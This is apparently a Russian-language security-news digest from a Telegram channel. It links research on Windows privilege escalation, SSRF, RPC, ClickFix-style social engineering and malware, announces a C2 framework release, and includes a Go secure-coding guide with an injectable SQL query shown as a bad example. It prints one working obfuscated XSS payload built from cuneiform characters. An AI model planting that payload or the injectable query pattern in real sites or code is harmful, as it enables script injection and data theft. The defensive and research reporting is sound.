Fsecurity | HH

🔗Ссылка: https://habr.com/ru/articles/920250/

Друзья, всем привет! Я наконец-то созрел и конвертировал текст своего выступления на CyberWave в статью. Любуйтесь злоупотреблением символическими ссылками на medium : ) https://cicada-8.medium.com/were-going-the-wrong-way-how-to-abuse-symlinks-and-get-lpe-in-windows-0c598b99125b

🔗Ссылка: https://opennet.ru/63464/

🔗Ссылка: https://slcyber.io/assetnote-security-research-center/novel-ssrf-technique-involving-http-redirect-loops/

AdaptixC2 v0.6 is out https://github.com/Adaptix-Framework/AdaptixC2 * Обновленная консоль агента с гибкими настройками * Оповещения в Telegram * OTP для синхронизации файлов и команд * Новая тема Dracula * Обновление до Golang 1.24.4 Полная информация по обновлению: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.5-greater-than-v0.6

🔗Ссылка: https://www.bleepingcomputer.com/news/security/bitopro-exchange-links-lazarus-hackers-to-11-million-crypto-heist/

А помните, мы рассказывали, как злоумышленники могут без авторизации производить перебор доменных пользователей через интерфейс MS-NRPC? На самом деле, это часть большого исследования нашего эксперта Хайдара Кабибо. Исследование посвящено одной из самых сложных технологий в ОС Windows: многоуровневой системе коммуникации Inter-Process Communication (IPC). Частью этой системы является и протокол RPC (Remote Procedure Call), который используется в упомянутой выше атаке. Недавно Хайдар начал публиковать полную версию своего исследования в виде серии блоговых постов, и вы уже можете ознакомиться с некоторыми из них. Первая часть представляет общий план исследования: оно покрывает все четыре уровня организации IPC, от самого высокого (DCOM) до технологий уровня ядра (Named Pipes, ALPC). Во второй части автор разбирает интерфейс RPC и показывает, как создавать собственные RPC-серверы и клиенты. Третья часть посвящена дескрипторами привязки (Binding Handles), которые используются в RPC для управления соединениями между сервером и клиентом. А в четвёртой части вы узнаете, как организована безопасность RPC. Здесь и объясняется, почему некоторые действия в этом протоколе можно выполнять с более низким уровнем аутентификации, чем вы ожидали; в частности, интерфейсы многих RPC-северов разрешают доступ безо всякой авторизации вообще. И это ещё не всё! Продолжение исследования – читайте в блоге Хайдара по мере публикации.

Ды вы охренели ! XSS payload, Cuneiform-alphabet based

"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"

#этопотомучтовывцерковьнеходите

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

💻 Go Security Audit

- Ну Го

В последние месяцы сообщество «вайбкодеров» набирает обороты, быстрая разработка прототипов и использование хайповых (или так уже никто не говорит 👀) библиотек стали нормой. Но вместе с ростом популярности приходят и проблемы. С каждым днём существования легкого доступа к LLM требования к качеству и безопасности кода только ужесточаются, и приходится всё внимательнее разбирать каждую строчку - от параметризации запросов и управления таймаутами до корректной работы с токенами, конкурентностью и цепочкой зависимостей. Далее, я подобрал примеры ошибок, которые допускают не только нейронки, но также и обычные НЕВАЙБ кодеры. 💉 Инъекции — beyond? Почему важно? Любая конкатенация строки + ввод = дыра.

// Плохо: fmt.Sprintf + Query

query := fmt.Sprintf("SELECT id, email FROM users WHERE email = '%s'", email)
db.Query(query)

// Правильно: PrepareContext + таймаут + закрытие stmt

ctx, cancel := context.WithTimeout(ctx, 200*time.Millisecond)
defer cancel()
stmt, err := db.PrepareContext(ctx, `
  SELECT id, email 
  FROM users 
  WHERE email = $1 AND deleted = FALSE
`)
if err != nil { return err }
defer stmt.Close()
row := stmt.QueryRowContext(ctx, email)

🔵 Контроль таймаута, явное закрытие stmt, фильтрация «мягко удалённых» записей. 🔵 Для Mongo/Redis — запрещайте $where-выражения, ограничивайте глубину BSON и размер документа ( (bson.M{"\$where": …})). 🔑 JWT & ключи — RS256 + кэйсинг заголовков

parser := &jwt.Parser{ValidMethods: []string{"RS256"}}
token, err := parser.ParseWithClaims(tokenStr, &CustomClaims{}, func(t *jwt.Token) (interface{}, error) {
    return publicKey, nil
})

🔵 Отбрасываем HS*-вставки, проверяем alg, jti, nbf, exp. 🔵 Приватные ключи держим в HSM/Vault, ротация через PKCS#11 или Vault Transit. 🗑 unsafe & бинарные протоколы

hdr := (*reflect.SliceHeader)(unsafe.Pointer(&b))
hdr.Len = header.Length
hdr.Cap = header.Length

Только после Code Review - проверка границ, выравнивания и GC-безопасности. 🔗 Зависимости & Supply Chain 🔵 govulncheck в CI/CD с --mode=imports + --mode=versions. 🔵 Go Proxy — свой прокси-миррор, чтобы исключить проблемки. 🔵 Блокировка PR при CVSS >= 8 (или epss/kev/ТЫК) и альтернативные фиксы через replace в go.mod. 🌪 Context & Cancellation — чтобы не "утекал" код Корректная передача context — базовый стандарт зрелых Go-сервисов.

// Создаём контекст с дедлайном для HTTP-запроса
ctx, cancel := context.WithTimeout(parentCtx, 2*time.Second)
defer cancel()  // обязательный вызов!
req, _ := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
_, err := http.DefaultClient.Do(req)

🔵 Никогда не забывать defer cancel(), даже при раннем return 🏎 Concurrency & Data Races — -race, sync vs atomic

// две горутины одновременно плюсуют visits
var visits int
go func() { visits++ }()
go func() { visits++ }()

Запуск go test -race в CI обнаружит такие случаи

Очень требовательно к ресурсам и не рекомендуется в монолитах или говно-микросервисах

// Правильно:
// С Mutex
var (
    visitsMu sync.Mutex
    visits   int
)
go func() {
    visitsMu.Lock()
    visits++
    visitsMu.Unlock()
}()

// Или атомарно
var visitsAtomic uint64
go func() {
    atomic.AddUint64(&visitsAtomic, 1)
}()

❌ Panic Recovery & Fault Tolerance — graceful failover Паника в одном handler’е не должна убивать весь HTTP-сервер:

func recoveryMiddleware(next http.Handler) http.Handler {
    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        defer func() {
            if rec := recover(); rec != nil {
                log.Error().
                    Interface("penic", rec).
                    Msg("recovered from penic xD in handler")
                http.Error(w, "internal error", http.StatusInternalServerError)
            }
        }()
        next.ServeHTTP(w, r)
    })
}

🔵 Прокидываем middleware на самый верх стека роутинга 🗒 Выводы Их не будет, просто примеры из практики. Смотрите внимательнее, что вам выдаёт chatgpt или аналоги. Добра и позитива appsec-ам, остальным соболезную 💥

🔗Ссылка: https://opennet.ru/63457/

В новой версии 0.6 можно будет к серверу привязать своего TG бота, который будет оповещать о разных событиях, например, что сессия прилетела)

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/920922/

‼️ CVE-2025-49144: Privilege Escalation в Notepad++ 8.8.1 🧠 Суть уязвимости Во время установки Notepad++ v8.8.1, установщик запускает зависимости, такие как regsvr32.exe, без указания полного пути. В Windows это означает, что система ищет бинарники согласно Search Order для DLL/EXE, начиная с текущего рабочего каталога. Если в этом каталоге находится вредоносный файл с нужным именем (например, regsvr32.exe), то он будет запущен с правами SYSTEM — теми же правами, что и сам установщик. Говорят что POC уже публично доступен😱 🔗https://www.cve.org/CVERecord?id=CVE-2025-49144 🔗 https://youtu.be/qCQlVllAfO0?si=NEKKOSCZbksn4Ata 🦔THF

🔗Ссылка: https://habr.com/ru/post/917522/

FileFix - A ClickFix Alternative Presenting an alternate method to the traditional ClickFix attack. ClickFix is a social engineering attack that prompts users to unknowingly execute malicious code, usually through the Run Dialog (Windows Key + R). The simplicity of this technique makes it funny, yet it’s been effective.

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/63448/

Привет, а я напоминаю, что это просто PoC, показывающий насколько просто скрыть малварь под легитимное приложение 🤥 https://research.checkpoint.com/2025/minecraft-mod-malware-stargazers/ https://xakep.ru/2025/06/19/stargazers-ghost-network-minecraft/

Server-Side XSS → SSRF → Компрометация облачной инфраструктуры: как одна картинка стоила целого облака В этой статье разберем атаку, начавшуюся с уязвимости XSS в генераторе изображений и завершившуюся получением полного доступа к облачной инфраструктуре. https://blog.deteact.ru/serverside-xss-ssrf-cloud-hacking/